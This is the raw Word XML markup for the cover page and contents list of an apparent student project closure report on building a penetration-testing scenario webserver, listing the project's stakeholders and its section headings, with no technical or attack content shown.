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6953202"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="5C43F000" w14:textId="469FC892" w:rsidR="00662B3D" w:rsidRDefault="00662B3D">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="355B269D" wp14:editId="04E51D1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9948A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988E98D" wp14:editId="688DDD6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A169B" w14:textId="37D0B491" w:rsidR="00662B3D" w:rsidRDefault="00DF7185" w:rsidP="00662B3D">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62B3D" w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="64"/>
                                        <w:szCs w:val="64"/>
                                      </w:rPr>
                                      <w:t>PENETRATION TESTING SCENAR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E23212" w14:textId="536E06FA" w:rsidR="00662B3D" w:rsidRDefault="00662B3D" w:rsidP="00662B3D">
                                    <w:pPr>
                                      <w:jc w:val="center"/>
                                      <w:rPr>
                                        <w:smallCaps/>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">PROJECT </w:t>
                                    </w:r>
                                    <w:r>
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t>CLOSURE</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                        <w:sz w:val="36"/>
                                        <w:szCs w:val="36"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve">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988E98D"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751A169B" w14:textId="37D0B491" w:rsidR="00662B3D" w:rsidRDefault="007553D4" w:rsidP="00662B3D">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62B3D" w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="64"/>
                                  <w:szCs w:val="64"/>
                                </w:rPr>
                                <w:t>PENETRATION TESTING SCENAR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E23212" w14:textId="536E06FA" w:rsidR="00662B3D" w:rsidRDefault="00662B3D" w:rsidP="00662B3D">
                              <w:pPr>
                                <w:jc w:val="center"/>
                                <w:rPr>
                                  <w:smallCaps/>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve">PROJECT </w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t>CLOSURE</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                                  <w:sz w:val="36"/>
                                  <w:szCs w:val="36"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> REPORT</w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="031467AA" w14:textId="7ADE5A1C" w:rsidR="00662B3D" w:rsidRDefault="00662B3D">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="103FE5EC" wp14:editId="7E032C5B">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>1022350</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>8216900</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="6489700" cy="18097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89700" cy="180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D0ADF02" w14:textId="5D0DBE21" w:rsidR="00662B3D" w:rsidRDefault="00662B3D" w:rsidP="00662B3D">
                                    <w:pPr>
                                      <w:pStyle w:val="NoSpacing"/>
                                      <w:rPr>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:t>PROJECT STAKEHOLDERS</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Sponsor: Robert Ludwiniak r.ludwiniak@napier.ac.uk</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Project Manager: David</w:t>
                                    </w:r>
                                    <w:r w:rsidR="00C04030">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:t xml:space="preserve"> </w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:t>Black  40457734@live.napier.ac.uk</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t xml:space="preserve">Consultant: Tim Drummond 40479269@live.napier.ac.uk </w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Consultant: Ada Wells 40444633@live.napier.ac.uk</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Consultant: Pawel Wilkowski 40537959@live.napier.ac.uk</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Consultant: Dan Anderson 40410538@live.napier.ac.uk</w:t>
                                    </w:r>
                                    <w:r w:rsidRPr="00662B3D">
                                      <w:rPr>
                                        <w:b/>
                                        <w:bCs/>
                                        <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                        <w:sz w:val="20"/>
                                        <w:szCs w:val="20"/>
                                      </w:rPr>
                                      <w:br/>
                                      <w:t>Consultant: Marco Giancola 40428070@live.napier.ac.u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3FE5EC" id="Text Box 153" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:80.5pt;margin-top:647pt;width:511pt;height:1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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox inset="126pt,0,54pt,0">
                      <w:txbxContent>
                        <w:sdt>
                          <w:sdtPr>
                            <w:rPr>
                              <w:b/>
                              <w:bCs/>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D0ADF02" w14:textId="5D0DBE21" w:rsidR="00662B3D" w:rsidRDefault="00662B3D" w:rsidP="00662B3D">
                              <w:pPr>
                                <w:pStyle w:val="NoSpacing"/>
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:t>PROJECT STAKEHOLDERS</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Sponsor: Robert Ludwiniak r.ludwiniak@napier.ac.uk</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Project Manager: David</w:t>
                              </w:r>
                              <w:r w:rsidR="00C04030">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:t>Black  40457734@live.napier.ac.uk</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t xml:space="preserve">Consultant: Tim Drummond 40479269@live.napier.ac.uk </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Consultant: Ada Wells 40444633@live.napier.ac.uk</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Consultant: Pawel Wilkowski 40537959@live.napier.ac.uk</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Consultant: Dan Anderson 40410538@live.napier.ac.uk</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00662B3D">
                                <w:rPr>
                                  <w:b/>
                                  <w:bCs/>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="20"/>
                                  <w:szCs w:val="20"/>
                                </w:rPr>
                                <w:br/>
                                <w:t>Consultant: Marco Giancola 40428070@live.napier.ac.uk</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49AD7B2" wp14:editId="291CD574">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:posOffset>222250</wp:posOffset>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:posOffset>8318500</wp:posOffset>
                    </wp:positionV>
                    <wp:extent cx="7315200" cy="2444750"/>
                    <wp:effectExtent l="0" t="0" r="0" b="1270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2444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211DF" w14:textId="3842533F" w:rsidR="00662B3D" w:rsidRDefault="00DF7185" w:rsidP="00662B3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62B3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49AD7B2" id="Text Box 152" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:17.5pt;margin-top:655pt;width:8in;height:192.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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox inset="126pt,0,54pt,0">
                      <w:txbxContent>
                        <w:p w14:paraId="789211DF" w14:textId="3842533F" w:rsidR="00662B3D" w:rsidRDefault="007553D4" w:rsidP="00662B3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62B3D">
                                <w:rPr>
                                  <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
                                  <w:sz w:val="18"/>
                                  <w:szCs w:val="18"/>
                                </w:rPr>
                                <w:t xml:space="preserve">     </w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="page" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="09A55B80" w14:textId="3F9A401E" w:rsidR="00022BA6" w:rsidRDefault="00022BA6" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B33BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3146561A" w14:textId="77777777" w:rsidR="00511070" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9A8D33" w14:textId="135EA756" w:rsidR="00511070" w:rsidRPr="00511070" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1: SUMMARY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DA1C43" w14:textId="5EC78896" w:rsidR="009B33BE" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009B33BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: INITIAL DEVELOPMENT</w:t>
      </w:r>
      <w:r w:rsidR="00A861C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F39C1" w14:textId="77777777" w:rsidR="00A861C7" w:rsidRDefault="00A861C7" w:rsidP="00A861C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3: TESTING OF INITIAL SET-UP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840E872" w14:textId="77777777" w:rsidR="00A861C7" w:rsidRDefault="00A861C7" w:rsidP="00A861C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4: SECURITY BASED ALTERATIONS MADE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438D05A7" w14:textId="141EA79F" w:rsidR="00A861C7" w:rsidRDefault="00A861C7" w:rsidP="00A861C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5: FINAL TESTING OF INITIAL CONFIGURATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA1E26" w14:textId="096592FC" w:rsidR="00511070" w:rsidRDefault="00641976" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00511070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: WEBSERVER SET-UP AND DEPLOYMENT</w:t>
      </w:r>
      <w:r w:rsidR="00A861C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(VSOC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDE02D5" w14:textId="00DDC157" w:rsidR="00511070" w:rsidRDefault="00641976" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00511070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: VULNERABILITY INCLUSIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA89197" w14:textId="27ACE4DA" w:rsidR="00E9393E" w:rsidRDefault="00641976" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00E9393E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: FINAL TESTING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5D2F1" w14:textId="79D4E484" w:rsidR="00511070" w:rsidRDefault="00641976" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00511070">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40284781" w14:textId="417D3B01" w:rsidR="00511070" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: APPENDICES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA17B6B" w14:textId="2AB710F3" w:rsidR="00511070" w:rsidRPr="00606117" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.1: PROJECT HEALTH REGISTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A529DBA" w14:textId="6C895558" w:rsidR="00511070" w:rsidRPr="00606117" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.2: LESSONS LEARNED</w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">a summary of improvements made to the project process and summary </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
        <w:t>commentary and recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C2A20" w14:textId="5B2F2F0B" w:rsidR="00511070" w:rsidRPr="00606117" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.3: PEER REVIEW</w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>feedback provided by a peer reviewer and the team's response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1913B1" w14:textId="1726551B" w:rsidR="00511070" w:rsidRPr="00606117" w:rsidRDefault="00511070" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00641976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.4: </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CLIENT SIGN-OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">a signed confirmation that the client has approved the product and all agreed </w:t>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E9393E" w:rsidRPr="00606117">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
        <w:t>deliverables have been handed over (an email from the client is acceptable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C2E28E" w14:textId="6A4475C1" w:rsidR="00E9393E" w:rsidRPr="007553D4" w:rsidRDefault="00846707" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007553D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00C04030" w:rsidRPr="007553D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: REFERENCES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB6DAA" w14:textId="3835F9F4" w:rsidR="00022BA6" w:rsidRPr="00E9393E" w:rsidRDefault="00022BA6" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9393E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>………….IMPLEMENTATION STAGES FROM KANBAN AND PLAN  REPORT…………</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDFC8F7" w14:textId="77777777" w:rsidR="00E9393E" w:rsidRDefault="00E9393E" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F9BD3F" w14:textId="77777777" w:rsidR="00E9393E" w:rsidRDefault="00E9393E" w:rsidP="00022BA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
